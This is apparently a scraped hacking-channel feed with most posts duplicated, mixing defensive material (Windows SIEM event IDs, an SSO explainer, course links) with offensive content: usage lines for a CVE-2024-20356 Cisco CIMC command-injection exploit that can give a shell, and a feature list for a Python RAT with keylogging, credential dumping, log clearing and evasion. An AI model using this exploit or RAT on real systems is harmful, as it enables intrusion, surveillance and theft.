Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ105 Windows SIEM Use Cases
1.Failed Login Attempts - Event ID: 4625
2.Account Lockouts - Event ID: 4740
3.Successful Login Outside Business Hours - Event ID: 4624
4.New User Creation - Event ID: 4720
5.Privileged Account Usage - Event ID: 4672
6.User Account Changes - Event IDs: 4722, 4723, 4724, 4725, 4726
7.Logon from Unusual Locations - Event ID: 4624 (with geolocation analysis)
8.Password Changes - Event ID: 4723 (change attempt), 4724 (successful reset)
9.Group Membership Changes - Event IDs: 4727, 4731, 4735, 4737
10.Suspicious Logon Patterns - Event ID: 4624 (anomalous logons)
11.Excessive Logon Failures - Event ID: 4625
12.Disabled Account Activity - Event ID: 4725
13.Dormant Account Usage - Event ID: 4624 (rarely used accounts)
14.Service Account Activity - Event IDs: 4624, 4672
15.RDP Access Monitoring - Event ID: 4624 (with RDP-specific filtering)
16.Lateral Movement Detection - Event ID: 4648 (network logons)
17.File and Folder Access - Event ID: 4663
18.Unauthorised File Sharing - Event IDs: 5140, 5145
19.Registry Changes - Event IDs: 4657
20.Application Installation and Removal - Event IDs: 11707, 1033
21.USB Device Usage - Event IDs: 20001, 20003 (from Device Management logs)
22.Windows Firewall Changes - Event IDs: 4946, 4947, 4950, 4951
23.Scheduled Task Creation - Event ID: 4698
24.Process Execution Monitoring - Event ID: 4688
25.System Restart or Shutdown - Event IDs: 6005, 6006, 1074
26.Event Log Clearing - Event ID: 1102
27.Malware Execution or Indicators - Event IDs: 4688, 1116 (from Windows Defender)
28.Active Directory Changes - Event IDs: 5136, 5141
29.Shadow Copy Deletion - Event ID: 524 (with VSSAdmin logs)
30.Network Configuration Changes - Event IDs: 4254, 4255, 10400
31.Execution of Suspicious Scripts - Event ID: 4688 (process creation with script interpreter)
32.Service Installation or Modification - Event ID: 4697
33.Clearing of Audit Logs - Event ID: 1102
34.Software Restriction Policy Violation - Event ID: 865
35.Excessive Account Enumeration - Event IDs: 4625, 4776
36.Attempt to Access Sensitive Files - Event ID: 4663
37.Unusual Process Injection - Event ID: 4688 (with EDR or Sysmon data)
38.Driver Installation - Event IDs: 7045 (Service Control Manager)
39.Modification of Scheduled Tasks - Event ID: 4699
40.Unauthorised GPO Changes - Event ID: 5136
41.Suspicious PowerShell Activity - Event ID: 4104 (from PowerShell logs)
42.Unusual Network Connections - Event ID: 5156 (network filtering platform)
43.Unauthorised Access to Shared Files - Event ID: 5145
44.DNS Query for Malicious Domains - Event ID: 5158 (DNS logs required)
45.LDAP Search Abuse - Event ID: 4662
46.Process Termination Monitoring - Event ID: 4689
47.Failed Attempts to Start a Service - Event ID: 7041
48.Audit Policy Changes - Event IDs: 4719, 1102
49.Time Change Monitoring - Event IDs: 4616, 520
50.BitLocker Encryption Key Changes - Event ID: 5379
ref: Shahaz Mz
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1.Failed Login Attempts - Event ID: 4625
2.Account Lockouts - Event ID: 4740
3.Successful Login Outside Business Hours - Event ID: 4624
4.New User Creation - Event ID: 4720
5.Privileged Account Usage - Event ID: 4672
6.User Account Changes - Event IDs: 4722, 4723, 4724, 4725, 4726
7.Logon from Unusual Locations - Event ID: 4624 (with geolocation analysis)
8.Password Changes - Event ID: 4723 (change attempt), 4724 (successful reset)
9.Group Membership Changes - Event IDs: 4727, 4731, 4735, 4737
10.Suspicious Logon Patterns - Event ID: 4624 (anomalous logons)
11.Excessive Logon Failures - Event ID: 4625
12.Disabled Account Activity - Event ID: 4725
13.Dormant Account Usage - Event ID: 4624 (rarely used accounts)
14.Service Account Activity - Event IDs: 4624, 4672
15.RDP Access Monitoring - Event ID: 4624 (with RDP-specific filtering)
16.Lateral Movement Detection - Event ID: 4648 (network logons)
17.File and Folder Access - Event ID: 4663
18.Unauthorised File Sharing - Event IDs: 5140, 5145
19.Registry Changes - Event IDs: 4657
20.Application Installation and Removal - Event IDs: 11707, 1033
21.USB Device Usage - Event IDs: 20001, 20003 (from Device Management logs)
22.Windows Firewall Changes - Event IDs: 4946, 4947, 4950, 4951
23.Scheduled Task Creation - Event ID: 4698
24.Process Execution Monitoring - Event ID: 4688
25.System Restart or Shutdown - Event IDs: 6005, 6006, 1074
26.Event Log Clearing - Event ID: 1102
27.Malware Execution or Indicators - Event IDs: 4688, 1116 (from Windows Defender)
28.Active Directory Changes - Event IDs: 5136, 5141
29.Shadow Copy Deletion - Event ID: 524 (with VSSAdmin logs)
30.Network Configuration Changes - Event IDs: 4254, 4255, 10400
31.Execution of Suspicious Scripts - Event ID: 4688 (process creation with script interpreter)
32.Service Installation or Modification - Event ID: 4697
33.Clearing of Audit Logs - Event ID: 1102
34.Software Restriction Policy Violation - Event ID: 865
35.Excessive Account Enumeration - Event IDs: 4625, 4776
36.Attempt to Access Sensitive Files - Event ID: 4663
37.Unusual Process Injection - Event ID: 4688 (with EDR or Sysmon data)
38.Driver Installation - Event IDs: 7045 (Service Control Manager)
39.Modification of Scheduled Tasks - Event ID: 4699
40.Unauthorised GPO Changes - Event ID: 5136
41.Suspicious PowerShell Activity - Event ID: 4104 (from PowerShell logs)
42.Unusual Network Connections - Event ID: 5156 (network filtering platform)
43.Unauthorised Access to Shared Files - Event ID: 5145
44.DNS Query for Malicious Domains - Event ID: 5158 (DNS logs required)
45.LDAP Search Abuse - Event ID: 4662
46.Process Termination Monitoring - Event ID: 4689
47.Failed Attempts to Start a Service - Event ID: 7041
48.Audit Policy Changes - Event IDs: 4719, 1102
49.Time Change Monitoring - Event IDs: 4616, 520
50.BitLocker Encryption Key Changes - Event ID: 5379
ref: Shahaz Mz
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ AI-powered ethical hacking :
: Features
- Natural Language Processing : Executes commands based on user input, translating intent into action seamlessly.
- Command Search Engine : Facilitates the search for services, ports, or specific terms, providing curated command suggestions to identify vulnerabilities.
ยป Supported Ethical Hacking Tools :
1. NMAP : Network discovery and security auditing.
2. OWASP ZAP (Full Scan Only) : Web application security scanner.
3. Crackmapexec : Network information gathering.
4. Nuclei : Template-based fast scanning with zero false positives.
ยป Compatibility
- Optimized for Linux : Fully functional on Linux platforms.
- Limited/No Support : Functionality on Windows or macOS is not guaranteed.
System Requirements
Non-Docker Installation
- Storage : 50GB
- RAM : 16GB minimum
- GPU : 8GB recommended for optimal performance.
ยป Dependencies
- Linux (Debian-based) :
- Installations:
- Git-based exploitdb:
ยปInstallation
Docker Installation
1. Pulling the image :
2. Running without GPU :
3. Running with GPU :
4. Autonomous mode :
- Default vulnerability scan:
- Custom NMAP vulnerability scan:
PIP Installation
1. Install:
2. Run:
3. For elevated privileges:
ยป Linux Post-Installation
1. Add the installation path to your
Nebula-Watcher (Optional Component)
PIP Installation
Docker Installation
1. Pull the image:
2. Run:
Customize diagram name:
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
: Features
- Natural Language Processing : Executes commands based on user input, translating intent into action seamlessly.
- Command Search Engine : Facilitates the search for services, ports, or specific terms, providing curated command suggestions to identify vulnerabilities.
ยป Supported Ethical Hacking Tools :
1. NMAP : Network discovery and security auditing.
2. OWASP ZAP (Full Scan Only) : Web application security scanner.
3. Crackmapexec : Network information gathering.
4. Nuclei : Template-based fast scanning with zero false positives.
ยป Compatibility
- Optimized for Linux : Fully functional on Linux platforms.
- Limited/No Support : Functionality on Windows or macOS is not guaranteed.
System Requirements
Non-Docker Installation
- Storage : 50GB
- RAM : 16GB minimum
- GPU : 8GB recommended for optimal performance.
ยป Dependencies
- Linux (Debian-based) :
- Installations:
sudo apt -y install exploitdb libreadline-dev wget nmap crackmapexec nuclei
- Git-based exploitdb:
sudo git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
ยปInstallation
Docker Installation
1. Pulling the image :
docker pull berylliumsec/nebula:latest
2. Running without GPU :
docker run --rm -it berylliumsec/nebula:latest
3. Running with GPU :
docker run --rm --gpus all -v "$(pwd)":/app/unified_models_no_zap -it berylliumsec/nebula:latest
4. Autonomous mode :
- Default vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --targets_list /app/targets.txt
- Custom NMAP vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --nmap_vuln_scan_command="nmap -Pn -sV --exclude-ports 21 --script=vulscan/vulscan.nse" --targets_list /app/targets.txt
PIP Installation
1. Install:
pip install nebula-ai
2. Run:
nebula
3. For elevated privileges:
sudo pip install nebula-ai
sudo nebula
ยป Linux Post-Installation
1. Add the installation path to your
.zshrc:export PATH="$HOME/.local/bin:$PATH"
Nebula-Watcher (Optional Component)
PIP Installation
pip3 install nebula-watcher
Docker Installation
1. Pull the image:
docker pull berylliumsec/nebula_watcher:latest
2. Run:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest
Customize diagram name:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest python3 nebula_watcher.py --diagram_name /app/your_diagram_name
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ Bitcoin Core Integration and Development:
>> What is Bitcoin Core?
Bitcoin Core is the reference implementation of Bitcoin, connecting to the peer-to-peer Bitcoin network. Its primary functions include:
- Downloading and fully validating blocks and transactions.
- Serving as a wallet.
- Providing an optional graphical user interface (GUI).
Binary versions are available for immediate use at [Bitcoin Core Downloads](https://bitcoincore.org/en/download/).
>> Licensing
Bitcoin Core is licensed under the MIT License, allowing free use and modification. Details can be found in the
>> Development Process
- Master Branch: Continuously built and tested but may not always be stable.
- Release Branches and Tags: Created regularly to mark stable releases.
- GUI Development: Exclusively managed in the [bitcoin-core/gui repository](https://github.com/bitcoin-core/gui). This repository mirrors the monotree's master branch and does not have release branches or tags.
>># Contribution
Developers can follow the workflow in
>> Testing and Quality Assurance
>># Automated Testing:
1. Unit Tests: Recommended for all new code and improvements to existing code. Use
2. Regression and Integration Tests: Written in Python, executed with:
3. CI Systems: Automatically test pull requests across Windows, Linux, and macOS platforms.
>># Manual Testing:
- Requires a reviewer distinct from the code author, particularly for substantial or high-risk changes.
- Adding a clear test plan in pull request descriptions is encouraged for complex changes.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> What is Bitcoin Core?
Bitcoin Core is the reference implementation of Bitcoin, connecting to the peer-to-peer Bitcoin network. Its primary functions include:
- Downloading and fully validating blocks and transactions.
- Serving as a wallet.
- Providing an optional graphical user interface (GUI).
Binary versions are available for immediate use at [Bitcoin Core Downloads](https://bitcoincore.org/en/download/).
>> Licensing
Bitcoin Core is licensed under the MIT License, allowing free use and modification. Details can be found in the
COPYING file or at the [MIT License site](https://opensource.org/licenses/MIT).>> Development Process
- Master Branch: Continuously built and tested but may not always be stable.
- Release Branches and Tags: Created regularly to mark stable releases.
- GUI Development: Exclusively managed in the [bitcoin-core/gui repository](https://github.com/bitcoin-core/gui). This repository mirrors the monotree's master branch and does not have release branches or tags.
>># Contribution
Developers can follow the workflow in
CONTRIBUTING.md. Additional insights and guidelines are in doc/developer-notes.md.>> Testing and Quality Assurance
>># Automated Testing:
1. Unit Tests: Recommended for all new code and improvements to existing code. Use
ctest to compile and run unit tests.2. Regression and Integration Tests: Written in Python, executed with:
build/test/functional/test_runner.py
3. CI Systems: Automatically test pull requests across Windows, Linux, and macOS platforms.
>># Manual Testing:
- Requires a reviewer distinct from the code author, particularly for substantial or high-risk changes.
- Adding a clear test plan in pull request descriptions is encouraged for complex changes.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Bitcoin Core
Download - Bitcoin
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ100% FREE classes for a pathway into cybersecurity and ethical hacking
Foundations:
Help Desk
โก๏ธTCM Security Academy โ Practical Help Desk (https://lnkd.in/geDEvt6d)
โก๏ธProfessor Messer โ 220-1101 and 220-1102 A+ Courses (https://lnkd.in/gKjJsSPz & https://lnkd.in/gMW3hMsv)
Networking
โก๏ธProfessor Messer โ N10-009 Network+ Course (https://lnkd.in/g8mYZaMm)
โก๏ธCisco Networking Academy โ Packet Tracer (https://lnkd.in/guGibYx6)
Linux
โก๏ธTCM Security Academy โ Linux 100: Fundamentals (https://lnkd.in/gEGHzxw3)
โก๏ธLinux Journey (https://linuxjourney.com/)
โก๏ธOverTheWire โ Bandit (https://lnkd.in/gRwPsump)
Programming
โก๏ธTCM Security โ Programming 100: Fundamentals (https://lnkd.in/gWZe2JRj)
โก๏ธFreeCodeCamp (https://lnkd.in/gbaHhV34)
โก๏ธCodecademy (https://lnkd.in/gxAHnTFD)
Security Essentials
โก๏ธProfessor Messer โ SY0-701 Security+ Course (https://lnkd.in/gfCCMJqQ)
Hacking Essentials
โก๏ธEthical Hacking in 15 Hours Part 1 (https://lnkd.in/gWump_cZ)
โก๏ธEthical Hacking in 15 Hours Part 2 (https://lnkd.in/gH9_Ap7F)
โก๏ธTryHackMe (https://tryhackme.com/)
Active Directory Hacking
โก๏ธHow to Build an Active Directory Hacking Lab (https://lnkd.in/g_9wjzhz)
โก๏ธHacking Active Directory for Beginners (https://lnkd.in/gaewN7nU)
Web Application Hacking
โก๏ธPortSwigger Web Security Academy (https://lnkd.in/gvx6NgcZ)
โก๏ธHacker101 (https://www.hacker101.com/)
โก๏ธBugcrowd University (https://lnkd.in/g_aPUcD8)
Ref: Heath Adams
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Foundations:
Help Desk
โก๏ธTCM Security Academy โ Practical Help Desk (https://lnkd.in/geDEvt6d)
โก๏ธProfessor Messer โ 220-1101 and 220-1102 A+ Courses (https://lnkd.in/gKjJsSPz & https://lnkd.in/gMW3hMsv)
Networking
โก๏ธProfessor Messer โ N10-009 Network+ Course (https://lnkd.in/g8mYZaMm)
โก๏ธCisco Networking Academy โ Packet Tracer (https://lnkd.in/guGibYx6)
Linux
โก๏ธTCM Security Academy โ Linux 100: Fundamentals (https://lnkd.in/gEGHzxw3)
โก๏ธLinux Journey (https://linuxjourney.com/)
โก๏ธOverTheWire โ Bandit (https://lnkd.in/gRwPsump)
Programming
โก๏ธTCM Security โ Programming 100: Fundamentals (https://lnkd.in/gWZe2JRj)
โก๏ธFreeCodeCamp (https://lnkd.in/gbaHhV34)
โก๏ธCodecademy (https://lnkd.in/gxAHnTFD)
Security Essentials
โก๏ธProfessor Messer โ SY0-701 Security+ Course (https://lnkd.in/gfCCMJqQ)
Hacking Essentials
โก๏ธEthical Hacking in 15 Hours Part 1 (https://lnkd.in/gWump_cZ)
โก๏ธEthical Hacking in 15 Hours Part 2 (https://lnkd.in/gH9_Ap7F)
โก๏ธTryHackMe (https://tryhackme.com/)
Active Directory Hacking
โก๏ธHow to Build an Active Directory Hacking Lab (https://lnkd.in/g_9wjzhz)
โก๏ธHacking Active Directory for Beginners (https://lnkd.in/gaewN7nU)
Web Application Hacking
โก๏ธPortSwigger Web Security Academy (https://lnkd.in/gvx6NgcZ)
โก๏ธHacker101 (https://www.hacker101.com/)
โก๏ธBugcrowd University (https://lnkd.in/g_aPUcD8)
Ref: Heath Adams
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆCommand Injection vulnerability in Cisco's CIMC:
>> Use it for testing purposes only !!!
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Use it for testing purposes only !!!
CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSafe CC Checkers :
S O :
To Check you CC Validity use only These URLS !!!
1๏ธโฃStripe
https://stripe.com
A powerful payment processing platform with fraud prevention features.
2๏ธโฃPayPal
https://www.paypal.com
A widely used and secure platform for online transactions.
3๏ธโฃSquare
https://squareup.com
Offers payment solutions and tools for small businesses.
4๏ธโฃKount
https://kount.com
Fraud prevention and digital identity trust solutions.
5๏ธโฃFraud.net
https://fraud.net
Provides AI-powered fraud detection for businesses.
6๏ธโฃRiskified
https://www.riskified.com
Fraud prevention and chargeback protection for eCommerce.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Credit card checker (CC checker) sites are generally unsafe and pose serious risks, as they are commonly used for fraudulent purposes or involve illegal activities. Legitimate businesses and individuals should avoid such platforms to protect themselves legally and financially. Here's why these sites are risky:
Illegal Usage: Most CC checkers facilitate fraud by validating stolen credit card information.
Data Theft: Entering sensitive details on these platforms can lead to your personal data being stolen.
Malware Risks: Many such sites embed malware or phishing attempts.
Legal Issues: Accessing or using these sites can expose you to legal action.
S O :
To Check you CC Validity use only These URLS !!!
1๏ธโฃStripe
https://stripe.com
A powerful payment processing platform with fraud prevention features.
2๏ธโฃPayPal
https://www.paypal.com
A widely used and secure platform for online transactions.
3๏ธโฃSquare
https://squareup.com
Offers payment solutions and tools for small businesses.
4๏ธโฃKount
https://kount.com
Fraud prevention and digital identity trust solutions.
5๏ธโฃFraud.net
https://fraud.net
Provides AI-powered fraud detection for businesses.
6๏ธโฃRiskified
https://www.riskified.com
Fraud prevention and chargeback protection for eCommerce.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Stripe
Stripe | Financial Infrastructure to Grow Your Revenue
Stripe is a suite of APIs powering online payment processing and commerce solutions for internet businesses of all sizes. Accept payments and scale faster with AI.
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆSSO (Single Sign-On) Explained.
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.
To fully understand the SSO process, ๐น๐ฒ๐โ๐ ๐๐ฎ๐ธ๐ฒ ๐ฎ ๐น๐ผ๐ผ๐ธ ๐ฎ๐ ๐ต๐ผ๐ ๐ฎ ๐๐๐ฒ๐ฟ ๐๐ผ๐๐น๐ฑ ๐น๐ผ๐ด ๐ถ๐ป๐๐ผ ๐๐ถ๐ป๐ธ๐ฒ๐ฑ๐๐ป ๐๐๐ถ๐ป๐ด ๐๐ผ๐ผ๐ด๐น๐ฒ ๐ฎ๐ ๐๐ต๐ฒ ๐ถ๐ฑ๐ฒ๐ป๐๐ถ๐๐ ๐ฝ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ:
1๏ธโฃ ๐จ๐๐ฒ๐ฟ ๐ฟ๐ฒ๐พ๐๐ฒ๐๐๐ ๐ฎ๐ฐ๐ฐ๐ฒ๐๐
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
2๏ธโฃ ๐๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฟ๐ฒ๐พ๐๐ฒ๐๐
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
3๏ธโฃ ๐๐ฑ๐ฃ ๐ฐ๐ต๐ฒ๐ฐ๐ธ๐ ๐ณ๐ผ๐ฟ ๐ฎ๐ฐ๐๐ถ๐๐ฒ ๐๐ฒ๐๐๐ถ๐ผ๐ป
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
4๏ธโฃ๐จ๐๐ฒ๐ฟ ๐๐๐ฏ๐บ๐ถ๐๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
5๏ธโฃ ๐๐ฑ๐ฃ ๐๐ฒ๐ฟ๐ถ๐ณ๐ถ๐ฒ๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
6๏ธโฃ ๐๐ฑ๐ฃ ๐๐ฒ๐ป๐ฑ๐ ๐๐ผ๐ธ๐ฒ๐ป ๐๐ผ ๐ฆ๐ฒ๐ฟ๐๐ถ๐ฐ๐ฒ ๐ฃ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).
7๏ธโฃ ๐๐ฐ๐ฐ๐ฒ๐๐ ๐ด๐ฟ๐ฎ๐ป๐๐ฒ๐ฑ ๐๐๐ถ๐ป๐ด ๐ฒ๐ ๐ถ๐๐๐ถ๐ป๐ด ๐๐ฒ๐๐๐ถ๐ผ๐ป
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
ref: Sayed Jillani
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.
To fully understand the SSO process, ๐น๐ฒ๐โ๐ ๐๐ฎ๐ธ๐ฒ ๐ฎ ๐น๐ผ๐ผ๐ธ ๐ฎ๐ ๐ต๐ผ๐ ๐ฎ ๐๐๐ฒ๐ฟ ๐๐ผ๐๐น๐ฑ ๐น๐ผ๐ด ๐ถ๐ป๐๐ผ ๐๐ถ๐ป๐ธ๐ฒ๐ฑ๐๐ป ๐๐๐ถ๐ป๐ด ๐๐ผ๐ผ๐ด๐น๐ฒ ๐ฎ๐ ๐๐ต๐ฒ ๐ถ๐ฑ๐ฒ๐ป๐๐ถ๐๐ ๐ฝ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ:
1๏ธโฃ ๐จ๐๐ฒ๐ฟ ๐ฟ๐ฒ๐พ๐๐ฒ๐๐๐ ๐ฎ๐ฐ๐ฐ๐ฒ๐๐
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
2๏ธโฃ ๐๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฟ๐ฒ๐พ๐๐ฒ๐๐
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
3๏ธโฃ ๐๐ฑ๐ฃ ๐ฐ๐ต๐ฒ๐ฐ๐ธ๐ ๐ณ๐ผ๐ฟ ๐ฎ๐ฐ๐๐ถ๐๐ฒ ๐๐ฒ๐๐๐ถ๐ผ๐ป
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
4๏ธโฃ๐จ๐๐ฒ๐ฟ ๐๐๐ฏ๐บ๐ถ๐๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
5๏ธโฃ ๐๐ฑ๐ฃ ๐๐ฒ๐ฟ๐ถ๐ณ๐ถ๐ฒ๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
6๏ธโฃ ๐๐ฑ๐ฃ ๐๐ฒ๐ป๐ฑ๐ ๐๐ผ๐ธ๐ฒ๐ป ๐๐ผ ๐ฆ๐ฒ๐ฟ๐๐ถ๐ฐ๐ฒ ๐ฃ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).
7๏ธโฃ ๐๐ฐ๐ฐ๐ฒ๐๐ ๐ด๐ฟ๐ฎ๐ป๐๐ฒ๐ฑ ๐๐๐ถ๐ป๐ด ๐ฒ๐ ๐ถ๐๐๐ถ๐ป๐ด ๐๐ฒ๐๐๐ถ๐ผ๐ป
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
ref: Sayed Jillani
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆScammers Actually Conduct Phishing Calls
- Secure yourself
ref: instagram
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
- Secure yourself
ref: instagram
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆPython Remote Administration Tool (RAT)
โ ๏ธThis feature list outlines a Python-based Remote Administration Tool (RAT) with extensive functionality across Windows, macOS, and Linux. Here's a detailed breakdown of the core features and their implications:
>> Cross-Platform Support
- Core Utilities
- Command and file auto-completion: Enhances usability, streamlining interactions.
- Antivirus detection: Useful for evasion tactics or reconnaissance.
- Display monitor control: Provides surveillance or energy management options.
- File/Directory manipulation: Hiding or unhiding files adds stealth capabilities.
- Hosts file modification: Potential for blocking or redirecting network traffic.
- Environment variables access: Useful for reconnaissance and configuration.
- Keylogger: Logs keystrokes with options to manage logs.
- Target machine info: Location and system details provide situational awareness.
- Python script execution: Flexibility for custom tasks.
- Screenshots: Remote visual access to the system's desktop.
- VM detection: Helps evade analysis environments.
- File transfer: Enables exfiltration or delivery of additional payloads.
- Password hash dumping: Attempts to extract sensitive authentication details.
- Payload disguise: Adds stealth by masquerading as legitimate applications.
>> Windows-Specific Features
- Credential Harvesting
- User/password dialog: Captures user input for credentials.
- Chrome password dumping: Extracts stored browser passwords.
- System Control
- Log clearing: Obscures tracks by erasing event logs.
- Service control: Manipulates RDP, UAC, and Windows Defender.
- File timestamp editing: Alters evidence of file access or modification.
- Custom popups: Creates distractions or elicits user input.
- Hardware Interaction
- Webcam snapshots: Spies on users via their webcam.
- Drive info: Provides details about connected drives.
- Registry summary: Fetches system configuration details.
>> macOS-Specific Features
- Credential Harvesting
- Similar password dialog as Windows.
- System Customization
- Changes login text, potentially confusing or misleading users.
- Webcam snapshots: Monitors users like the Windows version.
>> macOS/Linux Features
- SSH pivoting: Leverages the target system to access other hosts.
- Sudo command execution: Elevates privilege level for administrative tasks.
- Bruteforce user password: Exploits weak password practices.
- Webcam snapshots: Unverified functionality on Linux.
>> Transport and Encryption
- AES encryption secures host-target communication, with keys shared manually between systems for authentication.
>> Payload Installation
- NSIS installers (Windows): Packages payloads with elevation utilities.
- Makeself installers (macOS/Linux): Simplifies deployment and persistence.
>> Setup and Dependencies
- The project uses Python 2.7, various libraries like PyCrypto, Requests, and platform-specific tools like PyInstaller, PyObjC, and py2exe.
๐ฆ Here are the commands for setting up and running Stitch from the specified GitHub repository:
>> Installation Commands
1. For Windows:
2. For macOS:
3. For Linux:
>> Execution Commands
1. Run using Python:
2. Run as an executable (if permissions are set):
๐ฆBe Ethical, Use it for learning purposes !!!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ ๏ธThis feature list outlines a Python-based Remote Administration Tool (RAT) with extensive functionality across Windows, macOS, and Linux. Here's a detailed breakdown of the core features and their implications:
>> Cross-Platform Support
- Core Utilities
- Command and file auto-completion: Enhances usability, streamlining interactions.
- Antivirus detection: Useful for evasion tactics or reconnaissance.
- Display monitor control: Provides surveillance or energy management options.
- File/Directory manipulation: Hiding or unhiding files adds stealth capabilities.
- Hosts file modification: Potential for blocking or redirecting network traffic.
